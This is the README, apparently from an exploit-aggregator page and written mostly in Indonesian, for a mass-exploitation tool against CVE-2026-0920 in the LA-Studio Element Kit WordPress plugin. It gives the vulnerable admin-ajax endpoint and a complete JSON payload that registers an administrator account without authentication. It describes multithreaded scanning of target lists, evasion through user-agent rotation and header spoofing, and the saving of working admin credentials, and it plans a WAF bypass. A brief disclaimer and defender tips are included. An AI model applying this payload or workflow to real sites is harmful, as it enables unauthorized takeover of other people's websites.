Share
## https://sploitus.com/exploit?id=F219D284-1DA2-516E-83BA-7C5086AF0FBA
# CVE-2026-0920 Advanced Mass Exploiter




  
  
  
  



  Unauthenticated Administrator User Creation Exploit for LA-Studio Element Kit for Elementor (โ‰ค 1.5.6.3)


---

## โš ๏ธ PERINGATAN & ETIKA

**HANYA GUNAKAN PADA SISTEM YANG ANDA MILIKI ATAU MEMILIKI IZIN TERTULIS!**

Tool ini dibuat untuk tujuan:
- โœ… Testing keamanan sistem sendiri
- โœ… Penetration testing dengan izin
- โœ… Penelitian keamanan siber
- โœ… Pendidikan dan awareness

**PENGGUNAAN ILEGAL ADALAH TANGGUNG JAWAB PENGGUNA!**

---

## ๐Ÿ” Deskripsi Kerentanan

### ๐Ÿ“Š Detail CVE
- **CVE ID**: CVE-2026-0920 (Contoh)
- **Plugin**: LA-Studio Element Kit for Elementor
- **Versi Vulnerable**: โ‰ค 1.5.6.3
- **Tipe**: Unauthenticated Administrator Registration
- **Risiko**: CRITICAL (CVSS: 9.8)

### ๐ŸŽฏ Mekanisme Eksploitasi
Kerentanan ini memungkinkan penyerang membuat akun administrator WordPress tanpa otentikasi melalui endpoint AJAX plugin yang tidak aman.

---

## โœจ Fitur Utama

### ๐Ÿ” **Advanced Detection**
- **WordPress Detection**: Identifikasi otomatis sistem WordPress
- **Plugin Detection**: Deteksi LA-Studio Element Kit
- **Vulnerability Verification**: Verifikasi multi-metode
- **False Positive Reduction**: Minimalkan hasil positif palsu

### โšก **Mass Exploitation**
- **Concurrent Scanning**: Multi-threading hingga 50 thread
- **Smart Targeting**: Filter target non-WordPress
- **Rate Limiting**: Delay yang dapat dikonfigurasi
- **Progress Tracking**: Monitoring real-time

### ๐Ÿ” **Credential Management**
- **Auto-generation**: Buat username dan password otomatis
- **Strong Passwords**: Password acak 16 karakter
- **Realistic Usernames**: Username yang terlihat legit
- **Email Generation**: Email valid untuk registrasi

### ๐Ÿ“Š **Reporting & Verification**
- **Dual Verification**: Eksploitasi + Login verification
- **Structured Output**: VLUN_V.txt & VLUN.txt
- **Timestamp Tracking**: Waktu eksploitasi tercatat
- **Success Statistics**: Statistik lengkap hasil scanning

### ๐Ÿ›ก๏ธ **Stealth & Evasion**
- **Random User-Agents**: Rotasi user-agent
- **Request Throttling**: Hindari detection rate limiting
- **SSL Bypass**: Support HTTPS dengan verify=False
- **Header Spoofing**: Header request yang realistis

---

## ๐Ÿš€ Instalasi

### Prerequisites
```bash
# Python 3.7+
python3 --version

# pip package manager
pip --version
```

### Install Dependencies
```bash
# Clone repository
git clone https://github.com/O99099O/By-Poloss..-..CVE-2026-0920.git
cd By-Poloss..-..CVE-2026-0920

# Install requirements
pip install -r requirements.txt

# Atau install manual
pip install requests colorama
```

### Platform Specific
```bash
# Termux (Android)
pkg update && pkg upgrade
pkg install python git
pip install requests colorama

# Kali Linux
sudo apt update
sudo apt install python3 python3-pip
pip3 install requests colorama

# Windows (WSL)
sudo apt update
sudo apt install python3 python3-pip
pip3 install requests colorama
```

---

## โšก Penggunaan

### Basic Usage
```bash
# Eksploitasi single target
python3 cve_2026_0920.py targets.txt

# Mode verifikasi saja
python3 cve_2026_0920.py targets.txt -v

# Custom threads dan timeout
python3 cve_2026_0920.py targets.txt -t 20 -T 60
```

### Contoh Lengkap
```bash
# 1. Buat file targets.txt
echo "http://target1.com" >> targets.txt
echo "https://target2.com" >> targets.txt
echo "http://target3.com/wp-admin" >> targets.txt

# 2. Jalankan exploit dengan 15 threads
python3 cve_2026_0920.py targets.txt -t 15

# 3. Verifikasi mode untuk testing awal
python3 cve_2026_0920.py targets.txt -v -t 5

# 4. Exploit dengan timeout lebih lama
python3 cve_2026_0920.py targets.txt -T 45 -t 10
```

### Format targets.txt
```text
# Komentar dengan #
http://target1.com
https://target2.com
http://target3.com/wp-admin
# Skip baris kosong

# Multiple protocols supported
http://example.com
https://example.com
http://192.168.1.1
http://localhost:8080
```

---

## ๐ŸŽฏ Mode Operasi

| Mode | Deskripsi | Output Files |
|------|-----------|--------------|
| **Full Exploit** (Default) | Eksploitasi lengkap + verifikasi login | VLUN_V.txt, VLUN.txt |
| **Verify Only** (`-v`) | Hanya deteksi vulnerabilitas | VLUN.txt |

### Proses Workflow
```
1. Input Target โ†’ 2. WordPress Check โ†’ 3. Plugin Detection โ†’ 4. Vulnerability Check
       โ†“
5. Generate Credentials โ†’ 6. Exploitation โ†’ 7. Login Verification โ†’ 8. Save Results
```

---

## ๐Ÿ”ง Parameter & Opsi

```bash
# Basic
python3 cve_2026_0920.py targets.txt

# Advanced Options
python3 cve_2026_0920.py targets.txt \
    -t 20 \          # Threads (default: 10)
    -T 45 \          # Timeout seconds (default: 30)
    -v \             # Verify only mode
    -o results/      # Custom output directory

# Help Menu
python3 cve_2026_0920.py --help
```

### Parameter Detail
| Parameter | Deskripsi | Default |
|-----------|-----------|---------|
| `targets_file` | File berisi list target (wajib) | - |
| `-t, --threads` | Jumlah concurrent threads | 10 |
| `-T, --timeout` | Request timeout (seconds) | 30 |
| `-v, --verify` | Verify mode (no exploitation) | False |
| `-o, --output` | Custom output directory | Current dir |

---

## ๐Ÿ“Š Output & Reporting

### File Hasil
```
โ”œโ”€โ”€ VLUN_V.txt          # Verified exploited (credentials included)
โ”œโ”€โ”€ VLUN.txt            # Vulnerable targets (exploit attempted)
โ””โ”€โ”€ Baner.txt           # Custom banner (optional)
```

### Format VLUN_V.txt
```text
[2025-01-18 14:30:22] http://target.com
    Login URL: http://target.com/wp-login.php
    Username: admin_123
    Password: xY7!pQ9@mK4#bN2$
    Status: VERIFIED EXPLOITED
--------------------------------------------------------------------------------
```

### Format VLUN.txt
```text
[2025-01-18 14:30:22] http://vuln-target.com
    Login URL: http://vuln-target.com/wp-login.php
    Status: VULNERABLE
--------------------------------------------------------------------------------
```

### Contoh Output Terminal
```
[โ†’] Processing: http://target.com
[โœ“] WordPress with LA-Studio plugin detected: http://target.com
[โœ“] Vulnerable: http://target.com
[*] Attempt 1: http://target.com
[โœ“] EXPLOIT SUCCESS: http://target.com
    Login: http://target.com/wp-login.php
    Username: admin_789
    Password: aB3$fG8@jK1#mN6!
```

---

## ๐Ÿ›ก๏ธ Teknik Deteksi

### 1. WordPress Detection
- File signature (`wp-login.php`, `wp-admin/`)
- Meta generator tag
- HTML structure patterns
- Response header analysis

### 2. Plugin Detection
- Directory enumeration (`/wp-content/plugins/`)
- Page source analysis
- AJAX endpoint testing
- CSS/JS file patterns

### 3. Vulnerability Verification
- Multiple payload variations
- Response pattern matching
- JSON response parsing
- Error message analysis

### 4. Exploitation Verification
- Direct login attempt
- Session cookie validation
- Admin page access check
- Dashboard element detection

---

## ๐Ÿ” Credential Generation

### Username Pattern
```
prefix + "_" + random_digits(3) + suffix

Contoh: admin_123, user_456_web, manager_789_site
```

### Password Strength
```
Length: 16 characters
Charset: A-Z, a-z, 0-9, !@#$%^&*
Contoh: xY7!pQ9@mK4#bN2$
```

### Email Format
```
username@random_domain

Domains: gmail.com, yahoo.com, outlook.com, protonmail.com
```

---

## โš™๏ธ Konfigurasi Lanjutan

### Custom Banner
Buat file `Baner.txt` untuk custom ASCII art:
```text
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘      CVE-2026-0920 EXPLOITER        โ•‘
โ•‘      BY POLOSS - ADVANCED EDITION   โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
```

### User-Agent Rotation
Script secara otomatis merotasi 5 user-agent berbeda untuk menghindari detection.

### Request Headers
Headers lengkap untuk menyamar sebagai browser asli:
- User-Agent acak
- Accept headers
- Referer spoofing
- X-Requested-With
- Origin header

---

## ๐Ÿ“ˆ Performance Optimization

### Thread Management
```python
# Default: 10 threads (aman untuk kebanyakan sistem)
# Termux: 5 threads direkomendasikan
# High-end: 20-50 threads untuk VPS
```

### Timeout Settings
```python
# Normal: 30 detik
# Slow networks: 45-60 detik
# Local testing: 10-15 detik
```

### Memory Usage
- Clean result handling
- No unnecessary data storage
- Stream processing untuk large target lists

---

## ๐ŸŽฏ Target Scope

### Supported Targets
- โœ… WordPress dengan LA-Studio Element Kit โ‰ค 1.5.6.3
- โœ… HTTP & HTTPS
- โœ… Custom ports
- โœ… IP addresses langsung

### Filter Otomatis
- โŒ Non-WordPress sites
- โŒ WordPress tanpa plugin
- โŒ Plugin versi patched
- โŒ Sites dengan WAF blocking

---

## ๐Ÿšจ Troubleshooting

### Common Issues & Solutions

| Issue | Solution |
|-------|----------|
| `ConnectionError` | Periksa jaringan, coba timeout lebih besar |
| `SSL Verification Failed` | Script handle otomatis (verify=False) |
| `No targets processed` | Periksa format targets.txt |
| `Thread errors on Termux` | Kurangi threads (`-t 5`) |
| `Slow performance` | Tingkatkan timeout (`-T 45`) |
| `No results found` | Target mungkin tidak vulnerable |

### Debug Mode
```bash
# Tambahkan debug print di kode
print(f"[DEBUG] Processing: {url}")
print(f"[DEBUG] Response: {resp.status_code}")
print(f"[DEBUG] Content: {resp.text[:200]}")
```

---

## ๐Ÿ“š Referensi Teknis

### Vulnerability Details
- **Endpoint**: `/wp-admin/admin-ajax.php`
- **Action**: `lakit_register_action`
- **Parameters**: `lakit_user`, `lakit_email`, `lakit_password`, `lakit_bkrole`
- **Required**: `lakit_agree=on`

### Payload Structure
```json
{
  "action": "lakit_register_action",
  "lakit_user": "username",
  "lakit_email": "email@domain.com",
  "lakit_password": "password",
  "lakit_confirm_password": "password",
  "lakit_bkrole": "administrator",
  "security": "",
  "lakit_agree": "on"
}
```

### Response Patterns
```json
// Success Response
{"success": true, "message": "Registration successful"}

// Error Response (masih vulnerable)
{"success": false, "message": "Username already exists"}
```

---

## ๐Ÿ”’ Security Considerations

### Untuk Defender
1. **Update Plugin**: Versi terbaru LA-Studio Element Kit
2. **Input Validation**: Sanitize semua user input
3. **Capability Check**: Verifikasi user permissions
4. **Nonce Verification**: Implement security nonces
5. **Log Monitoring**: Monitor suspicious registration attempts

### Untuk Peneliti
1. **Authorization Check**: Selama verifikasi capability
2. **Rate Limiting**: Batasi request ke admin-ajax.php
3. **Input Sanitization**: Filter semua parameter
4. **Output Encoding**: Prevent XSS pada response

---

## ๐Ÿ“„ Lisensi

MIT License - Lihat [LICENSE](LICENSE) untuk detail lengkap.

```
Copyright (c) 2026 BY POLOSS

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

1. Hanya digunakan untuk testing sistem sendiri atau dengan izin tertulis
2. Tidak digunakan untuk aktivitas ilegal
3. Penulis tidak bertanggung jawab atas penyalahgunaan
```

---

## ๐Ÿ‘จโ€๐Ÿ’ป Developer

**BY POLOSS**
- GitHub: [@O99099O](https://github.com/O99099O)
- Project: [CVE-2026-0920 Exploiter](https://github.com/O99099O/By-Poloss..-..CVE-2026-0920)

---

## ๐Ÿ“ˆ Statistics


  
  
  
  


---

## ๐Ÿ”„ Changelog

### v1.0.0 (Initial Release)
- โœ… Advanced WordPress detection
- โœ… Plugin-specific vulnerability checking
- โœ… Mass exploitation with threading
- โœ… Credential generation and verification
- โœ… Comprehensive reporting system
- โœ… Stealth features (UA rotation, headers)

### v1.1.0 (Planned)
- ๐Ÿ”„ Proxy support
- ๐Ÿ”„ Custom payload configuration
- ๐Ÿ”„ Enhanced WAF bypass
- ๐Ÿ”„ JSON export format
- ๐Ÿ”„ Performance improvements

---

## ๐Ÿค Contributing

1. Fork repository
2. Create feature branch (`git checkout -b feature/AmazingFeature`)
3. Commit changes (`git commit -m 'Add AmazingFeature'`)
4. Push to branch (`git push origin feature/AmazingFeature`)
5. Open Pull Request

**Bug Reports & Suggestions**: [GitHub Issues](https://github.com/O99099O/By-Poloss..-..CVE-2026-0920/issues)

---

## ๐ŸŒŸ Acknowledgments

- WordPress Security Team
- LA-Studio for prompt patching
- Security researchers community
- Open-source tools developers

---

๐ŸŽ€ ๐šƒ๐š‘๐šŠ๐š—๐š” ๐šˆ๐š˜๐šž ๐™ต๐š˜๐š› ๐š…๐š’๐šœ๐š’๐š๐š’๐š—๐š! ๐ŸŽ€


  



  



  BY POLOSS โ€ข January 2026



  Advanced โ€ข Accurate โ€ข Professional Security Tool